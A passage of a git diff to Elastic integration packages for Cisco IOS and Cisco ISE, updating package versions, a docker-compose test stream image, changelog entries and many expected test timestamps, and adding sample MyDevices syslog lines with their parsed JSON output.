-format_version: "3.0.0" +format_version: "3.0.3" name: cisco_ios title: Cisco IOS -version: "1.24.1" +version: "1.26.5" description: Collect logs from Cisco IOS with Elastic Agent. type: integration categories: diff --git a/packages/cisco_ise/_dev/deploy/docker/docker-compose.yml b/packages/cisco_ise/_dev/deploy/docker/docker-compose.yml index a6aa39d0b79..07eb145dbe2 100644 --- a/packages/cisco_ise/_dev/deploy/docker/docker-compose.yml +++ b/packages/cisco_ise/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" cisco_ise-log-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9025 -p=tcp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9025 -p=tcp /sample_logs/log.log cisco_ise-log-udp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9026 -p=udp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9026 -p=udp /sample_logs/log.log diff --git a/packages/cisco_ise/changelog.yml b/packages/cisco_ise/changelog.yml index c7638922fd6..8c7763bfe19 100644 --- a/packages/cisco_ise/changelog.yml +++ b/packages/cisco_ise/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.22.1" + changes: + - description: Make Cisco ISE syslog priority field optional + type: enhancement + link: https://github.com/elastic/integrations/pull/9533 +- version: "1.22.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "1.21.4" + changes: + - description: Remove duplicate 'event.code' 60077 from list for category mapping. + type: bugfix + link: https://github.com/elastic/integrations/pull/9165 - version: "1.21.3" changes: - description: Fix ingest pipeline conditional field handling. diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-ad-connector.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-ad-connector.log-expected.json index 50dd6610ac2..f6b9f8dcb66 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-ad-connector.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-ad-connector.log-expected.json @@ -755,7 +755,7 @@ ] }, { - "@timestamp": "2023-03-03T10:42:25.000Z", + "@timestamp": "2024-03-03T10:42:25.000Z", "cisco_ise": { "log": { "ad": { @@ -804,7 +804,7 @@ ] }, { - "@timestamp": "2023-03-03T10:42:25.000+02:00", + "@timestamp": "2024-03-03T10:42:25.000+02:00", "cisco_ise": { "log": { "ad": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-administrative-and-operational-audit.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-administrative-and-operational-audit.log-expected.json index ba50d468d31..74a7a9157a1 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-administrative-and-operational-audit.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-administrative-and-operational-audit.log-expected.json @@ -2247,7 +2247,7 @@ ] }, { - "@timestamp": "2023-03-15T08:30:16.000Z", + "@timestamp": "2024-03-15T08:30:16.000Z", "cisco_ise": { "log": { "admin": { @@ -2306,7 +2306,7 @@ ] }, { - "@timestamp": "2023-03-15T09:34:39.000Z", + "@timestamp": "2024-03-15T09:34:39.000Z", "cisco_ise": { "log": { "admin": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-authentication-flow-diagnostics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-authentication-flow-diagnostics.log-expected.json index fa0189f8de5..6a44d991278 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-authentication-flow-diagnostics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-authentication-flow-diagnostics.log-expected.json @@ -962,7 +962,7 @@ } }, { - "@timestamp": "2023-03-28T11:23:25.000Z", + "@timestamp": "2024-03-28T11:23:25.000Z", "cisco_ise": { "log": { "acs": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-cise-alarm.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-cise-alarm.log-expected.json index 92d76d7ed45..487b3adb08b 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-cise-alarm.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-cise-alarm.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-09-26T02:17:37.000Z", + "@timestamp": "2024-09-26T02:17:37.000Z", "cisco_ise": { "log": { "category": { @@ -46,7 +46,7 @@ ] }, { - "@timestamp": "2023-09-24T16:05:07.000Z", + "@timestamp": "2024-09-24T16:05:07.000Z", "cisco_ise": { "log": { "category": { @@ -91,7 +91,7 @@ ] }, { - "@timestamp": "2023-09-24T16:05:07.000Z", + "@timestamp": "2024-09-24T16:05:07.000Z", "cisco_ise": { "log": { "category": { @@ -135,7 +135,7 @@ ] }, { - "@timestamp": "2023-09-26T02:17:17.000Z", + "@timestamp": "2024-09-26T02:17:17.000Z", "cisco_ise": { "log": { "category": { @@ -179,7 +179,7 @@ ] }, { - "@timestamp": "2023-09-26T02:17:17.000Z", + "@timestamp": "2024-09-26T02:17:17.000Z", "cisco_ise": { "log": { "category": { @@ -223,7 +223,7 @@ ] }, { - "@timestamp": "2023-09-26T02:17:17.000Z", + "@timestamp": "2024-09-26T02:17:17.000Z", "cisco_ise": { "log": { "category": { @@ -267,7 +267,7 @@ ] }, { - "@timestamp": "2023-09-26T02:17:07.000Z", + "@timestamp": "2024-09-26T02:17:07.000Z", "cisco_ise": { "log": { "category": { @@ -312,7 +312,7 @@ ] }, { - "@timestamp": "2023-09-26T02:17:07.000Z", + "@timestamp": "2024-09-26T02:17:07.000Z", "cisco_ise": { "log": { "category": { @@ -356,7 +356,7 @@ ] }, { - "@timestamp": "2023-09-24T16:04:27.000Z", + "@timestamp": "2024-09-24T16:04:27.000Z", "cisco_ise": { "log": { "category": { @@ -401,7 +401,7 @@ ] }, { - "@timestamp": "2023-09-26T02:16:17.000Z", + "@timestamp": "2024-09-26T02:16:17.000Z", "cisco_ise": { "log": { "category": { @@ -445,7 +445,7 @@ ] }, { - "@timestamp": "2023-09-26T02:16:17.000Z", + "@timestamp": "2024-09-26T02:16:17.000Z", "cisco_ise": { "log": { "category": { @@ -489,7 +489,7 @@ ] }, { - "@timestamp": "2023-09-24T16:03:57.000Z", + "@timestamp": "2024-09-24T16:03:57.000Z", "cisco_ise": { "log": { "category": { @@ -533,7 +533,7 @@ ] }, { - "@timestamp": "2023-09-24T16:03:47.000Z", + "@timestamp": "2024-09-24T16:03:47.000Z", "cisco_ise": { "log": { "category": { @@ -578,7 +578,7 @@ ] }, { - "@timestamp": "2023-09-24T16:03:47.000Z", + "@timestamp": "2024-09-24T16:03:47.000Z", "cisco_ise": { "log": { "category": { @@ -622,7 +622,7 @@ ] }, { - "@timestamp": "2023-09-26T07:22:57.000Z", + "@timestamp": "2024-09-26T07:22:57.000Z", "cisco_ise": { "log": { "calling_station_id": "AA-FF-FF-FE-4E-EE", @@ -672,7 +672,7 @@ ] }, { - "@timestamp": "2023-09-26T07:22:57.000Z", + "@timestamp": "2024-09-26T07:22:57.000Z", "cisco_ise": { "log": { "calling_station_id": "AA-AA-6F-65-29-3A", @@ -722,7 +722,7 @@ ] }, { - "@timestamp": "2023-09-26T07:22:57.000Z", + "@timestamp": "2024-09-26T07:22:57.000Z", "cisco_ise": { "log": { "calling_station_id": "54-B2-AA-AA-AA-88", @@ -772,7 +772,7 @@ ] }, { - "@timestamp": "2023-09-26T07:22:57.000Z", + "@timestamp": "2024-09-26T07:22:57.000Z", "cisco_ise": { "log": { "category": { @@ -817,7 +817,7 @@ ] }, { - "@timestamp": "2023-09-26T02:15:57.000Z", + "@timestamp": "2024-09-26T02:15:57.000Z", "cisco_ise": { "log": { "category": { @@ -861,7 +861,7 @@ ] }, { - "@timestamp": "2023-09-26T02:15:47.000Z", + "@timestamp": "2024-09-26T02:15:47.000Z", "cisco_ise": { "log": { "category": { @@ -905,7 +905,7 @@ ] }, { - "@timestamp": "2023-09-26T02:15:47.000Z", + "@timestamp": "2024-09-26T02:15:47.000Z", "cisco_ise": { "log": { "category": { @@ -949,7 +949,7 @@ ] }, { - "@timestamp": "2023-09-26T02:15:47.000Z", + "@timestamp": "2024-09-26T02:15:47.000Z", "cisco_ise": { "log": { "category": { @@ -994,7 +994,7 @@ ] }, { - "@timestamp": "2023-09-24T16:03:27.000Z", + "@timestamp": "2024-09-24T16:03:27.000Z", "cisco_ise": { "log": { "calling_station_id": "C0-25-AA-AA-AA-CA", diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-failed-attempts.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-failed-attempts.log-expected.json index dfcfd69cf54..67aa8e428d9 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-failed-attempts.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-failed-attempts.log-expected.json @@ -1164,7 +1164,7 @@ } }, { - "@timestamp": "2023-03-02T11:10:16.000Z", + "@timestamp": "2024-03-02T11:10:16.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-guest.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-guest.log-expected.json index 531d4b1b50c..ca149bc2263 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-guest.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-guest.log-expected.json @@ -186,7 +186,7 @@ } }, { - "@timestamp": "2023-03-28T11:46:05.000Z", + "@timestamp": "2024-03-28T11:46:05.000Z", "cisco_ise": { "log": { "authentication": { @@ -248,7 +248,7 @@ ] }, { - "@timestamp": "2023-03-28T15:59:33.000Z", + "@timestamp": "2024-03-28T15:59:33.000Z", "cisco_ise": { "log": { "category": { @@ -298,7 +298,7 @@ ] }, { - "@timestamp": "2023-03-28T16:00:31.000Z", + "@timestamp": "2024-03-28T16:00:31.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-identity-stores-diagnostics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-identity-stores-diagnostics.log-expected.json index 248cd16e56c..7afb7e3da11 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-identity-stores-diagnostics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-identity-stores-diagnostics.log-expected.json @@ -1304,7 +1304,7 @@ ] }, { - "@timestamp": "2023-03-28T11:23:25.000Z", + "@timestamp": "2024-03-28T11:23:25.000Z", "cisco_ise": { "log": { "acs": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-internal-operations-diagnostics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-internal-operations-diagnostics.log-expected.json index 7e3f716d794..2e8ff23fa4d 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-internal-operations-diagnostics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-internal-operations-diagnostics.log-expected.json @@ -325,7 +325,7 @@ ] }, { - "@timestamp": "2023-03-28T10:51:49.000Z", + "@timestamp": "2024-03-28T10:51:49.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log index 1faf1b85579..9f5f3e3ba21 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log @@ -2,3 +2,7 @@ <182>Mar 3 09:24:40 cisco-ise-host CISE_MyDevices 0000082656 1 0 2022-03-03 09:24:40.424 +00:00 0000082723 88010 INFO MyDevices: Successfully registered/provisioned the device (endpoint), ConfigVersionId=1628, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:01, EPIdentityGroup=RegisteredDevices, Staticassignment=true, EndPointProfiler=ise.host.local, EndPointPolicy=Unknown, DeviceName=test2, DeviceRegistrationStatus=Pending, ResponseTime=35 <179>Mar 3 09:24:53 cisco-ise-host CISE_MyDevices 0000082659 1 0 2022-03-03 09:24:53.482 +00:00 0000082726 88013 ERROR MyDevices: Failed to perform a CoA termination, ConfigVersionId=1629, EPMacAddress=00:00:00:00:00:00, EndpointCoA=Terminate, <182>Mar 28 11:46:57 cisco-ise-host CISE_MyDevices 0000000231 4 1 AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=Any, PsnHostName=cisco-ise-host.host.local, EPMacAddress=12:34:52:24:24:32, +Apr 3 09:24:53 cisco-ise-host CISE_MyDevices 0000082658 1 0 2022-03-03 09:24:53.393 +00:00 0000082725 88004 INFO MyDevices: Successfully deleted the device (endpoint), ConfigVersionId=1629, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:00, EPIdentityGroup=Unknown, Staticassignment=false, EndPointProfiler=ise.host.local, EndPointPolicy=Xerox-Device, DeviceName=test, DeviceRegistrationStatus=NotRegistered, ResponseTime=35, +Apr 3 09:24:40 cisco-ise-host CISE_MyDevices 0000082656 1 0 2022-03-03 09:24:40.424 +00:00 0000082723 88010 INFO MyDevices: Successfully registered/provisioned the device (endpoint), ConfigVersionId=1628, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:01, EPIdentityGroup=RegisteredDevices, Staticassignment=true, EndPointProfiler=ise.host.local, EndPointPolicy=Unknown, DeviceName=test2, DeviceRegistrationStatus=Pending, ResponseTime=35 +Apr 3 09:24:53 cisco-ise-host CISE_MyDevices 0000082659 1 0 2022-03-03 09:24:53.482 +00:00 0000082726 88013 ERROR MyDevices: Failed to perform a CoA termination, ConfigVersionId=1629, EPMacAddress=00:00:00:00:00:00, EndpointCoA=Terminate, +Apr 28 11:46:57 cisco-ise-host CISE_MyDevices 0000000231 4 1 AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=Any, PsnHostName=cisco-ise-host.host.local, EPMacAddress=12:34:52:24:24:32, diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log-expected.json index cdc2534848a..6a911a613de 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log-expected.json @@ -274,7 +274,7 @@ ] }, { - "@timestamp": "2023-03-28T11:46:57.000Z", + "@timestamp": "2024-03-28T11:46:57.000Z", "cisco_ise": { "log": { "authentication": { @@ -336,6 +336,335 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2022-03-03T09:24:53.393Z", + "cisco_ise": { + "log": { + "authentication": { + "identity_store": "Internal Users" + }, + "category": { + "name": "CISE_MyDevices" + }, + "config_version": { + "id": 1629 + }, + "device": { + "name": "test", + "registration_status": "NotRegistered" + }, + "endpoint": { + "policy": "Xerox-Device", + "profiler": "ise.host.local" + }, + "ep": { + "identity_group": "Unknown", + "mac": { + "address": "00:00:00:00:00:00" + } + }, + "identity": { + "group": "ALL_ACCOUNTS (default)" + }, + "message": { + "code": "88004", + "description": "MyDevices: Successfully deleted the device (endpoint)", + "id": "0000082658" + }, + "portal": { + "name": "My Devices Portal (default)" + }, + "psn": { + "hostname": "ise.host.local" + }, + "response": { + "time": 35 + }, + "segment": { + "number": 0, + "total": 1 + }, + "static": { + "assignment": false + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "mydevices", + "category": [ + "configuration" + ], + "code": "88004", + "kind": "event", + "original": "Apr 3 09:24:53 cisco-ise-host CISE_MyDevices 0000082658 1 0 2022-03-03 09:24:53.393 +00:00 0000082725 88004 INFO MyDevices: Successfully deleted the device (endpoint), ConfigVersionId=1629, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:00, EPIdentityGroup=Unknown, Staticassignment=false, EndPointProfiler=ise.host.local, EndPointPolicy=Xerox-Device, DeviceName=test, DeviceRegistrationStatus=NotRegistered, ResponseTime=35,", + "sequence": 82725, + "timezone": "+00:00", + "type": [ + "info" + ] + }, + "host": { + "hostname": "cisco-ise-host" + }, + "log": { + "level": "info", + "syslog": { + "severity": { + "name": "info" + } + } + }, + "message": "2022-03-03 09:24:53.393 +00:00 0000082725 88004 INFO MyDevices: Successfully deleted the device (endpoint), ConfigVersionId=1629, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:00, EPIdentityGroup=Unknown, Staticassignment=false, EndPointProfiler=ise.host.local, EndPointPolicy=Xerox-Device, DeviceName=test, DeviceRegistrationStatus=NotRegistered, ResponseTime=35,", + "related": { + "hosts": [ + "cisco-ise-host" + ], + "ip": [ + "81.2.69.144" + ], + "user": [ + "test" + ] + }, + "source": { + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "test" + } + }, + { + "@timestamp": "2022-03-03T09:24:40.424Z", + "cisco_ise": { + "log": { + "authentication": { + "identity_store": "Internal Users" + }, + "category": { + "name": "CISE_MyDevices" + }, + "config_version": { + "id": 1628 + }, + "device": { + "name": "test2", + "registration_status": "Pending" + }, + "endpoint": { + "policy": "Unknown", + "profiler": "ise.host.local" + }, + "ep": { + "identity_group": "RegisteredDevices", + "mac": { + "address": "00:00:00:00:00:01" + } + }, + "identity": { + "group": "ALL_ACCOUNTS (default)" + }, + "message": { + "code": "88010", + "description": "MyDevices: Successfully registered/provisioned the device (endpoint)", + "id": "0000082656" + }, + "portal": { + "name": "My Devices Portal (default)" + }, + "psn": { + "hostname": "ise.host.local" + }, + "segment": { + "number": 0, + "total": 1 + }, + "static": { + "assignment": true + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "mydevices", + "category": [ + "configuration" + ], + "code": "88010", + "kind": "event", + "original": "Apr 3 09:24:40 cisco-ise-host CISE_MyDevices 0000082656 1 0 2022-03-03 09:24:40.424 +00:00 0000082723 88010 INFO MyDevices: Successfully registered/provisioned the device (endpoint), ConfigVersionId=1628, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:01, EPIdentityGroup=RegisteredDevices, Staticassignment=true, EndPointProfiler=ise.host.local, EndPointPolicy=Unknown, DeviceName=test2, DeviceRegistrationStatus=Pending, ResponseTime=35", + "sequence": 82723, + "timezone": "+00:00", + "type": [ + "info" + ] + }, + "host": { + "hostname": "cisco-ise-host" + }, + "log": { + "level": "info", + "syslog": { + "severity": { + "name": "info" + } + } + }, + "message": "2022-03-03 09:24:40.424 +00:00 0000082723 88010 INFO MyDevices: Successfully registered/provisioned the device (endpoint), ConfigVersionId=1628, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:01, EPIdentityGroup=RegisteredDevices, Staticassignment=true, EndPointProfiler=ise.host.local, EndPointPolicy=Unknown, DeviceName=test2, DeviceRegistrationStatus=Pending, ResponseTime=35", + "related": { + "hosts": [ + "cisco-ise-host" + ], + "ip": [ + "81.2.69.144" + ], + "user": [ + "test" + ] + }, + "source": { + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "test" + } + }, + { + "@timestamp": "2022-03-03T09:24:53.482Z", + "cisco_ise": { + "log": { + "category": { + "name": "CISE_MyDevices" + }, + "config_version": { + "id": 1629 + }, + "endpoint": { + "coa": "Terminate" + }, + "ep": { + "mac": { + "address": "00:00:00:00:00:00" + } + }, + "message": { + "code": "88013", + "description": "MyDevices: Failed to perform a CoA termination", + "id": "0000082659" + }, + "segment": { + "number": 0, + "total": 1 + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "mydevices", + "category": [ + "configuration" + ], + "code": "88013", + "kind": "event", + "original": "Apr 3 09:24:53 cisco-ise-host CISE_MyDevices 0000082659 1 0 2022-03-03 09:24:53.482 +00:00 0000082726 88013 ERROR MyDevices: Failed to perform a CoA termination, ConfigVersionId=1629, EPMacAddress=00:00:00:00:00:00, EndpointCoA=Terminate,", + "sequence": 82726, + "timezone": "+00:00", + "type": [ + "info" + ] + }, + "host": { + "hostname": "cisco-ise-host" + }, + "log": { + "level": "error", + "syslog": { + "severity": { + "name": "error" + } + } + }, + "message": "2022-03-03 09:24:53.482 +00:00 0000082726 88013 ERROR MyDevices: Failed to perform a CoA termination, ConfigVersionId=1629, EPMacAddress=00:00:00:00:00:00, EndpointCoA=Terminate,", + "related": { + "hosts": [ + "cisco-ise-host" + ] + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-04-28T11:46:57.000Z", + "cisco_ise": { + "log": { + "authentication": { + "identity_store": "Internal Users" + }, + "category": { + "name": "CISE_MyDevices" + }, + "ep": { + "mac": { + "address": "12:34:52:24:24:32" + } + }, + "identity": { + "group": "Any" + }, + "message": { + "id": "0000000231" + }, + "portal": { + "name": "My Devices Portal (default)" + }, + "psn": { + "hostname": "cisco-ise-host.host.local" + }, + "segment": { + "number": 1, + "total": 4 + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "configuration" + ], + "kind": "event", + "original": "Apr 28 11:46:57 cisco-ise-host CISE_MyDevices 0000000231 4 1 AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=Any, PsnHostName=cisco-ise-host.host.local, EPMacAddress=12:34:52:24:24:32,", + "type": [ + "info" + ] + }, + "host": { + "hostname": "cisco-ise-host" + }, + "message": "AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=Any, PsnHostName=cisco-ise-host.host.local, EPMacAddress=12:34:52:24:24:32,", + "related": { + "hosts": [ + "cisco-ise-host" + ] + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-passed-authentications.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-passed-authentications.log-expected.json index 55638100479..e287589ca4e 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-passed-authentications.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-passed-authentications.log-expected.json @@ -584,7 +584,7 @@ ] }, { - "@timestamp": "2023-03-03T09:11:58.000Z", + "@timestamp": "2024-03-03T09:11:58.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-policy-diagnostics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-policy-diagnostics.log-expected.json index 09832249d8b..5cd9e6685a1 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-policy-diagnostics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-policy-diagnostics.log-expected.json @@ -717,7 +717,7 @@ } }, { - "@timestamp": "2023-03-28T11:23:25.000Z", + "@timestamp": "2024-03-28T11:23:25.000Z", "cisco_ise": { "log": { "acs": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-posture-client-provisioning-audit.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-posture-client-provisioning-audit.log-expected.json index 2d94af4229f..942bd0f28c3 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-posture-client-provisioning-audit.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-posture-client-provisioning-audit.log-expected.json @@ -74,7 +74,7 @@ ] }, { - "@timestamp": "2023-02-26T22:15:22.000Z", + "@timestamp": "2024-02-26T22:15:22.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-accounting.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-accounting.log-expected.json index f8bd7c09c34..c34e495fa05 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-accounting.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-accounting.log-expected.json @@ -281,7 +281,7 @@ } }, { - "@timestamp": "2023-04-27T11:18:08.000Z", + "@timestamp": "2024-04-27T11:18:08.000Z", "cisco_ise": { "log": { "acct": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-diagnostics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-diagnostics.log-expected.json index 4e260ac21fa..02d0f8e9b5a 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-diagnostics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-diagnostics.log-expected.json @@ -2930,7 +2930,7 @@ } }, { - "@timestamp": "2023-03-02T10:54:40.000Z", + "@timestamp": "2024-03-02T10:54:40.000Z", "cisco_ise": { "log": { "calling_station": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-system-statistics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-system-statistics.log-expected.json index 55711e49fdc..dc0f7330434 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-system-statistics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-system-statistics.log-expected.json @@ -450,7 +450,7 @@ ] }, { - "@timestamp": "2023-03-10T09:11:50.000Z", + "@timestamp": "2024-03-10T09:11:50.000Z", "cisco_ise": { "log": { "active_session": { @@ -528,7 +528,7 @@ ] }, { - "@timestamp": "2023-03-16T02:34:02.000Z", + "@timestamp": "2024-03-16T02:34:02.000Z", "cisco_ise": { "log": { "active_session": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-tacacs-accounting.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-tacacs-accounting.log-expected.json index c35aed77703..09bd7bda11b 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-tacacs-accounting.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-tacacs-accounting.log-expected.json @@ -483,7 +483,7 @@ } }, { - "@timestamp": "2023-02-21T19:13:08.000Z", + "@timestamp": "2024-02-21T19:13:08.000Z", "cisco_ise": { "log": { "acct": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-threat-centric-nac.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-threat-centric-nac.log-expected.json index b8c9926d458..70ec7002a63 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-threat-centric-nac.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-threat-centric-nac.log-expected.json @@ -194,7 +194,7 @@ ] }, { - "@timestamp": "2023-03-03T00:02:46.000Z", + "@timestamp": "2024-03-03T00:02:46.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 5c76551fa11..d746364600c 100644 --- a/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -13,8 